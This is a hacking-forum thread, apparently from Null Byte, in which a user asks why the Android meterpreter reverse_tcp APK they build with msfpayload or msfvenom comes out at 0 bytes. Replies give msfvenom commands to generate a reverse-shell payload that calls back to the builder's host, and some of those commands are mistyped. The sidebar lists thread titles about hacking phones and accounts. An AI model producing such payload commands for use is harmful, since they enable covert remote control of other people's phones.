Hi guys first thx to all who help me alot i have a simple problem with my msfvenom when i create my payload
msfpayload android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
the seize of payload after create is 0 buyte
can any one eplain to me why and how to fix this problem btw i use backbox os
Forum Thread: [UNSOLVED] Msfvenom Android Payload Problem
- Hot
- Active
-
Forum Thread: Problem with .Apk Payloads 19 Replies
9 hrs ago -
Forum Thread: www.prohealthpedia.com/Retro-X-Power/ 0 Replies
10 hrs ago -
Forum Thread: health2wealthclub.Com/Biogenix-Rx/ 0 Replies
12 hrs ago -
Forum Thread: Http://thesupplementcop.com/Alpha-Testo-Boost-X/ 0 Replies
15 hrs ago -
Forum Thread: http://thesupplementcop.com/alpha-testo-boost-x/ 0 Replies
16 hrs ago -
Forum Thread: Parrot Security Os Problem...... 12 Replies
1 day ago -
Forum Thread: Airdump-Ng Can't Find Any Network in Monitor Mode 6 Replies
2 days ago -
Forum Thread: Wlan Rename After Update / Upgrade in Kali Linux 1 Replies
2 days ago -
How to: HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide] 134 Replies
3 days ago -
How to: Embed MSF Payload in Original APK Files | Part #1 - Using TheFatRAT 19 Replies
3 days ago -
Forum Thread: Https Site in My Browser Automatically Downgrade into Http or Site Not Open..Am I Hacked . 1 Replies
3 days ago -
Forum Thread: Kali Linux Initramfs Boot Error 0 Replies
4 days ago -
Forum Thread: I Want to Hack a Facebook Account. 9 Replies
5 days ago -
Forum Thread: How to Hack Router Password to Access Router Control Panel? 6 Replies
5 days ago -
Forum Thread: How to Hack an Android Device with Only a Ip Adress 36 Replies
5 days ago -
Forum Thread: My Instagram Account Has Been Hacked 0 Replies
6 days ago -
Forum Thread: Deauth Tutorial? 5 Replies
6 days ago -
Forum Thread: Bruteforcing Social Media Passwords Using Python 0 Replies
1 wk ago -
How to: Install Metasploit Framework on Android | Part #1 - in TermuX 78 Replies
1 wk ago -
Forum Thread: Armitage Can't Show "Attack" Menu in Host 4 Replies
1 wk ago
-
How To: Spy on Traffic from a Smartphone with Wireshark
-
How To: Use Hash-Identifier to Determine Hash Types for Password Cracking
-
How To: Get Root Filesystem Access via Samba Symlink Traversal
-
How to Hack Wi-Fi: Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To: Identify Missing Windows Patches for Easier Exploitation
-
How To: Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To: Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How To: 4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
How To: Securely Sniff Wi-Fi Packets with Sniffglue
-
How To: Top 10 Things to Do After Installing Kali Linux
-
How To: Get Unlimited Free Trials Using a "Real" Fake Credit Card Number
-
How To: Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To: Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
Android for Hackers: How to Turn an Android Phone into a Hacking Device Without Root
-
How To: Hack Windows 7 (Become Admin)
-
How To: Set Up a Headless Raspberry Pi Hacking Platform Running Kali Linux
-
How To: Hack Android Using Kali (Remotely)
-
How To: Automate Wi-Fi Hacking with Wifite2
-
How To: Hack UnrealIRCd Using Python Socket Programming
-
How To: Build a Beginner Hacking Kit with the Raspberry Pi 3 Model B+
4 Responses
Intead of msfpayload you should use:
msfvenom -p android/meterpreter/reversetcp LHOST=yourip LPORT= your_port R > /root/name.apk
And it doesnt matter what os you are using. Msf is same everywhere :) good luck
yeah thx it's work fine but when i install it in my phone there's a problem look at this
https://null-byte.wonderhowto.com/forum/decrypt-android-payload-0175188/
i use this but same the seize is 0 byte of the payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=my ip LPORTmy port R > /root/name.apk
you have to update your metasploit to last version then run thin
msfvenom -p android/meterpreter/reverse_http HOST=my ip LPORTmy port 0 /root/name.apk
Share Your Thoughts